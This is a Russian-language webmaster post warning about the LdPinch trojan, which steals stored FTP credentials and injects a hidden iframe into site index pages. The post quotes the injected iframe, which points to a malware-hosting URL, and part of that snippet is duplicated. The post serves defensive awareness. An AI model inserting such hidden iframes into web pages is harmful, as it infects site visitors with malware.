Случайно было замечено, что некоторые морды повываливались из Яндекса по причине действия вируса. Да, да… именно вируса, а точнее троянца, как это ни странно
Trojan-PSW.Win32.LdPinch.bik — именно так называется троянец. Принцип действия очень прост. Троянская программа ворует логины, пароли пользователя для FTP-соединений прописанные в программах Total Commander, FAR, SmartFTP. Всю полученную информацию программа отправляет на электронную почту злоумышленника spartak***@mail.ru. Который в последствии, по предположениям, с помощью специального программного обеспечения в автоматическом режиме заходит на FTP сервера и прописывает в файл index лежащий в корне код с фреймом который ведет на вирус.
Код, который помещается в файл index:
CODE
<IFRAME name="StatPage1"
src="http://hard-tsunami.info/xep/in.php?adv=3"
width=5 height=5 style="display:none"></IFRAME>
src="http://hard-tsunami.info/xep/in.php?adv=3"
width=5 height=5 style="display:none"></IFRAME>
После переиндексации такие морды напрочь выпадают из кэша поисковой системы. Однако это не самое страшное, потому как злоумышленник обладает доступом к вашему FTP серверу и может осуществлять с ним любые деяния. Последствия действия троянца каждый может себе представить.
Информационная справка
Trojan-PSW.Win32.LdPinch.bik - Троянская программа, относящаяся к семейству троянов, ворующих пароли пользователя. Предназначена для кражи конфиденциальной информации. Является приложением Windows (PE EXE-файл). Имеет размер - 25600 байт. Упакована при помощи UPX, распакованный размер - около 250 КБ. Написана на Ассемблере.
Рекомендации по удалению
Если ваш компьютер оказался заражен данным вирусом, то для его удаления необходимо:
Выгрузить из памяти компьютера активный троянский процесс
Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
Ссылки по теме:
Один из случаев выпадения морды по причине вируса:
http://mastertalk.ru/topic22779.html
Подробная информация о трояне:
http://www.viruslist....virusid=147349
(с) mustofik
